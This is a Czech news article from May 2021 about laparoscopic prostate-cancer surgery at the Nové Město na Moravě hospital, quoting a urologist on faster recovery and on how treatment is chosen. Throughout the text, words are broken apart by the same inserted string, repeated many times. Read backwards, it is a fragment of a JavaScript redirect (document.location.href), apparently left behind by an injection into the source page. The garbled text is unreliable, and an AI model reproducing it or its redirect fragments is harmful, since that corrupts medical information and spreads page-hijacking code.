Rainbow page separator

S miniinvazivními operacemi prostaty už mají urologové zkušenosti

Pondělí, 31. května 2021

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Už více než rok urologové z novoměstské nemocnice provádějí miniinvazivní odstranění prostaty při jejím zhoubném nádoru. Ověřili si v praxi, že operace laparoskopickou me[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];todou nabízí pacientům především šetrnější způsob léčby i kratší dobu rekonvalescence.
„Tou[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to me[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];todou je operace provedena přes pět menších ranek. U některých pacientů, kteří mají rizikovější nádor, je tak[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to možné současně odstranit i příslušné mízní uzliny. Jako výhodu pozorujeme především rychlejší zotavování. Někteří pacienti mohli být propuštěni již čtvrtý pátý den po operaci. Stejně tak sledujeme i onkologické výsledky operace, které jsou srovnatelné s předchozím přístupem a obdobně si všímáme i výrazně nižších nežádoucích účinků, které jsou srovnatelné s laparoskopií roboticky asis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovanou,“ uvedl urolog Jiří Janů.
Za předpokladu, že lékaři u pacienta zvažují operaci, může být klasická, anebo miniinvazivní. Ta zahrnuje buď laparoskopické zákroky, nebo laparoskopie roboticky asis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tované, nicméně vždy jde o odstranění prostaty a semenných váčků.
„Při volbě způsobu léčby vycházíme ze stádia onemocnění, ale k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu je třeba také zohlednit celkový stav a také případná přidružená onemocnění pacienta. V případě nádorů v nízkém stadiu se nejčastěji rozhodujeme mezi léčbou operační a ozařovací. U pacientů s vyšším stádiem karcinomu prostaty je v některých případech možné provést ozařování, jinak je zahajována hormonální léčba,“ popsal urolog s tím, že rakovina prostaty je druhým nejčastějším onkologickým onemocněním u mužů v České republice i v celé Evropě.